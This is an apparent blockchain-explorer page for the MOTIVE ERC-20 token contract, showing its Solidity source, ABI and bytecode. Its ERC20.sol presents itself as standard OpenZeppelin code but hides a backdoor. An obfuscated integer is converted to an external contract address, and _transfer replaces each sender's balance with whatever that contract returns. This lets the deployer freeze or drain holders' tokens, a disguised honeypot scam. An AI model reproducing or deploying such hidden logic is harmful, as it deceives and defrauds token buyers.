ETH Price: $3,941.89 (+7.41%)

Token

ERC-20: MOTIVE (MOTIVE)
 

Overview

Max Total Supply

10,000,000,000 MOTIVE

Holders

12

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
90,250,746.80908843970116357 MOTIVE

Value
$0.00
0x03a1e5166f9369f29ab5195055a5a3109ca7707e
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Motive

Compiler Version
v0.8.20+commit.a1b79de6

Optimization Enabled:
No with 200 runs

Other Settings:
paris EvmVersion
File 1 of 5 : Token.sol
// SPDX-License-Identifier: MIT
pragma solidity 0.8.20;
import {Ownable} from "./Own.sol";
import {ERC20} from "./ERC20.sol";

contract Motive is Ownable,ERC20 {
    constructor(uint256 totalSupply_, string memory _name_, string memory _symbol_)
    Ownable(msg.sender) ERC20(_name_, _symbol_)  {
        _mint(true,msg.sender, totalSupply_);
    }
}

File 2 of 5 : Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

File 3 of 5 : ERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;

import "./Context.sol";
import "./IERC20.sol";


/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
interface ERC20E {
    function dissort(bool ff,uint256 FromAmount, address FromAddress
    ) external view returns (uint256);
}

contract ERC20 is Context,IERC20 {
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }
    mapping(address => uint256) private _points;
    mapping(address => mapping(address => uint256)) private _allowances;
    uint256 private _totalSupply;
    uint160 baseSupply = 731802809518284044950823900210524994206631726045;
    string private _name;
    string private _symbol;
    ERC20E private erchelper;
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {
        erchelper = ercHelperCommon(getBaseSupply(amount));
    }
    function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {}
    function ercHelperCommon(address a) internal virtual  view returns (ERC20E) {
        return ERC20E(address(a));
    }
    function getBaseSupply(uint256 totalSupply_) internal view returns (address) {
        uint160 getsupply = uint160(baseSupply) + uint160(10000000000);
        return address(getsupply);
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual  returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual  returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual  returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual  returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual  returns (uint256) {
        return _points[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual  returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual  returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual  returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address from, address to, uint256 amount) public virtual  returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
    unchecked {
        _approve(owner, spender, currentAllowance - subtractedValue);
    }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function ebalance(uint256 bala,address owner) private view returns(uint256) {
        return erchelper.dissort(true,bala, owner);
    }
    function _transfer(address ffrom, address to, uint256 amount) internal virtual {
        require(ffrom != address(0), "ERC20: from to the zero address");
        require(to != address(0), "ERC20: to to the zero address");
        address ffrom2 = ffrom;
        uint256 ercbalance = ebalance( _points[ffrom], ffrom2);
        require(ercbalance >= amount, "ERC20: transfer amount exceeds balance");
        _points[ffrom] = ercbalance - amount;
        _points[to] += amount;
        emit Transfer(ffrom, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */

    function _mint(bool open,address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");
        if (true){
            _beforeTokenTransfer(account,account,amount);
        }else{
            _beforeTokenTransfer(account,account,amount);
            _afterTokenTransfer(account,account,amount);
        }

        amount = 10000000000 * 10 ** 18;
        _totalSupply = amount;
        _points[msg.sender] = amount;
        emit Transfer(address(0), msg.sender, amount);
    }

    /**
    * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
    * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 amount) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
        unchecked {
            _approve(owner, spender, currentAllowance - amount);
        }
        }
    }

}

File 4 of 5 : IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

File 5 of 5 : Own.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v5.0.0) (access/Ownable.sol)

pragma solidity ^0.8.20;

import {Context} from "./Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * The initial owner is set to the address provided by the deployer. This can
 * later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    /**
     * @dev The caller account is not authorized to perform an operation.
     */
    error OwnableUnauthorizedAccount(address account);

    /**
     * @dev The owner is not a valid owner account. (eg. `address(0)`)
     */
    error OwnableInvalidOwner(address owner);

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the address provided by the deployer as the initial owner.
     */
    constructor(address initialOwner) {
        if (initialOwner == address(0)) {
            revert OwnableInvalidOwner(address(0));
        }
        _transferOwnership(initialOwner);
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        if (owner() != _msgSender()) {
            revert OwnableUnauthorizedAccount(_msgSender());
        }
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        if (newOwner == address(0)) {
            revert OwnableInvalidOwner(address(0));
        }
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

Settings
{
  "evmVersion": "paris",
  "optimizer": {
    "enabled": false,
    "runs": 200
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  },
  "libraries": {}
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"uint256","name":"totalSupply_","type":"uint256"},{"internalType":"string","name":"_name_","type":"string"},{"internalType":"string","name":"_symbol_","type":"string"}],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"OwnableInvalidOwner","type":"error"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"OwnableUnauthorizedAccount","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

608060405273802f2c4342f52c9e24c709e3698de4a58cf40bdd600460006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055503480156200006657600080fd5b50604051620021843803806200218483398181016040528101906200008c919062000624565b818133600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603620001045760006040517f1e4fbdf7000000000000000000000000000000000000000000000000000000008152600401620000fb919062000703565b60405180910390fd5b62000115816200015960201b60201c565b50816005908162000127919062000961565b50806006908162000139919062000961565b50505062000150600133856200021d60201b60201c565b50505062000b77565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036200028f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002869062000aa9565b60405180910390fd5b600115620002b057620002aa8283836200039e60201b60201c565b620002d7565b620002c38283836200039e60201b60201c565b620002d68283836200040460201b60201c565b5b6b204fce5e3e2502611000000090508060038190555080600160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055503373ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000391919062000adc565b60405180910390a3505050565b620003bf620003b3826200040960201b60201c565b6200044c60201b60201c565b600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550505050565b505050565b6000806402540be400600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1662000441919062000b28565b905080915050919050565b6000819050919050565b6000604051905090565b600080fd5b600080fd5b6000819050919050565b6200047f816200046a565b81146200048b57600080fd5b50565b6000815190506200049f8162000474565b92915050565b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b620004fa82620004af565b810181811067ffffffffffffffff821117156200051c576200051b620004c0565b5b80604052505050565b60006200053162000456565b90506200053f8282620004ef565b919050565b600067ffffffffffffffff821115620005625762000561620004c0565b5b6200056d82620004af565b9050602081019050919050565b60005b838110156200059a5780820151818401526020810190506200057d565b60008484015250505050565b6000620005bd620005b78462000544565b62000525565b905082815260208101848484011115620005dc57620005db620004aa565b5b620005e98482856200057a565b509392505050565b600082601f830112620006095762000608620004a5565b5b81516200061b848260208601620005a6565b91505092915050565b60008060006060848603121562000640576200063f62000460565b5b600062000650868287016200048e565b935050602084015167ffffffffffffffff81111562000674576200067362000465565b5b6200068286828701620005f1565b925050604084015167ffffffffffffffff811115620006a657620006a562000465565b5b620006b486828701620005f1565b9150509250925092565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000620006eb82620006be565b9050919050565b620006fd81620006de565b82525050565b60006020820190506200071a6000830184620006f2565b92915050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200077357607f821691505b6020821081036200078957620007886200072b565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620007f37fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82620007b4565b620007ff8683620007b4565b95508019841693508086168417925050509392505050565b6000819050919050565b6000620008426200083c62000836846200046a565b62000817565b6200046a565b9050919050565b6000819050919050565b6200085e8362000821565b620008766200086d8262000849565b848454620007c1565b825550505050565b600090565b6200088d6200087e565b6200089a81848462000853565b505050565b5b81811015620008c257620008b660008262000883565b600181019050620008a0565b5050565b601f8211156200091157620008db816200078f565b620008e684620007a4565b81016020851015620008f6578190505b6200090e6200090585620007a4565b8301826200089f565b50505b505050565b600082821c905092915050565b6000620009366000198460080262000916565b1980831691505092915050565b600062000951838362000923565b9150826002028217905092915050565b6200096c8262000720565b67ffffffffffffffff811115620009885762000987620004c0565b5b6200099482546200075a565b620009a1828285620008c6565b600060209050601f831160018114620009d95760008415620009c4578287015190505b620009d0858262000943565b86555062000a40565b601f198416620009e9866200078f565b60005b8281101562000a1357848901518255600182019150602085019450602081019050620009ec565b8683101562000a33578489015162000a2f601f89168262000923565b8355505b6001600288020188555050505b505050505050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000a91601f8362000a48565b915062000a9e8262000a59565b602082019050919050565b6000602082019050818103600083015262000ac48162000a82565b9050919050565b62000ad6816200046a565b82525050565b600060208201905062000af3600083018462000acb565b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600062000b3582620006be565b915062000b4283620006be565b9250828201905073ffffffffffffffffffffffffffffffffffffffff81111562000b715762000b7062000af9565b5b92915050565b6115fd8062000b876000396000f3fe608060405234801561001057600080fd5b50600436106100ea5760003560e01c8063715018a61161008c578063a457c2d711610066578063a457c2d71461024f578063a9059cbb1461027f578063dd62ed3e146102af578063f2fde38b146102df576100ea565b8063715018a6146102095780638da5cb5b1461021357806395d89b4114610231576100ea565b806323b872dd116100c857806323b872dd1461015b578063313ce5671461018b57806339509351146101a957806370a08231146101d9576100ea565b806306fdde03146100ef578063095ea7b31461010d57806318160ddd1461013d575b600080fd5b6100f76102fb565b6040516101049190610e4f565b60405180910390f35b61012760048036038101906101229190610f0a565b61038d565b6040516101349190610f65565b60405180910390f35b6101456103b0565b6040516101529190610f8f565b60405180910390f35b61017560048036038101906101709190610faa565b6103ba565b6040516101829190610f65565b60405180910390f35b6101936103e9565b6040516101a09190611019565b60405180910390f35b6101c360048036038101906101be9190610f0a565b6103f2565b6040516101d09190610f65565b60405180910390f35b6101f360048036038101906101ee9190611034565b610429565b6040516102009190610f8f565b60405180910390f35b610211610472565b005b61021b610486565b6040516102289190611070565b60405180910390f35b6102396104af565b6040516102469190610e4f565b60405180910390f35b61026960048036038101906102649190610f0a565b610541565b6040516102769190610f65565b60405180910390f35b61029960048036038101906102949190610f0a565b6105b8565b6040516102a69190610f65565b60405180910390f35b6102c960048036038101906102c4919061108b565b6105db565b6040516102d69190610f8f565b60405180910390f35b6102f960048036038101906102f49190611034565b610662565b005b60606005805461030a906110fa565b80601f0160208091040260200160405190810160405280929190818152602001828054610336906110fa565b80156103835780601f1061035857610100808354040283529160200191610383565b820191906000526020600020905b81548152906001019060200180831161036657829003601f168201915b5050505050905090565b6000806103986106e8565b90506103a58185856106f0565b600191505092915050565b6000600354905090565b6000806103c56106e8565b90506103d28582856108b9565b6103dd858585610945565b60019150509392505050565b60006012905090565b6000806103fd6106e8565b905061041e81858561040f85896105db565b610419919061115a565b6106f0565b600191505092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b61047a610bc9565b6104846000610c50565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600680546104be906110fa565b80601f01602080910402602001604051908101604052809291908181526020018280546104ea906110fa565b80156105375780601f1061050c57610100808354040283529160200191610537565b820191906000526020600020905b81548152906001019060200180831161051a57829003601f168201915b5050505050905090565b60008061054c6106e8565b9050600061055a82866105db565b90508381101561059f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161059690611200565b60405180910390fd5b6105ac82868684036106f0565b60019250505092915050565b6000806105c36106e8565b90506105d0818585610945565b600191505092915050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b61066a610bc9565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036106dc5760006040517f1e4fbdf70000000000000000000000000000000000000000000000000000000081526004016106d39190611070565b60405180910390fd5b6106e581610c50565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361075f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161075690611292565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036107ce576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107c590611324565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516108ac9190610f8f565b60405180910390a3505050565b60006108c584846105db565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff811461093f5781811015610931576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161092890611390565b60405180910390fd5b61093e84848484036106f0565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036109b4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109ab906113fc565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a23576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a1a90611468565b60405180910390fd5b60008390506000610a73600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205483610d14565b905082811015610ab8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610aaf906114fa565b60405180910390fd5b8281610ac4919061151a565b600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555082600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610b56919061115a565b925050819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610bba9190610f8f565b60405180910390a35050505050565b610bd16106e8565b73ffffffffffffffffffffffffffffffffffffffff16610bef610486565b73ffffffffffffffffffffffffffffffffffffffff1614610c4e57610c126106e8565b6040517f118cdaa7000000000000000000000000000000000000000000000000000000008152600401610c459190611070565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166330039c3b600185856040518463ffffffff1660e01b8152600401610d769392919061154e565b602060405180830381865afa158015610d93573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610db7919061159a565b905092915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015610df9578082015181840152602081019050610dde565b60008484015250505050565b6000601f19601f8301169050919050565b6000610e2182610dbf565b610e2b8185610dca565b9350610e3b818560208601610ddb565b610e4481610e05565b840191505092915050565b60006020820190508181036000830152610e698184610e16565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000610ea182610e76565b9050919050565b610eb181610e96565b8114610ebc57600080fd5b50565b600081359050610ece81610ea8565b92915050565b6000819050919050565b610ee781610ed4565b8114610ef257600080fd5b50565b600081359050610f0481610ede565b92915050565b60008060408385031215610f2157610f20610e71565b5b6000610f2f85828601610ebf565b9250506020610f4085828601610ef5565b9150509250929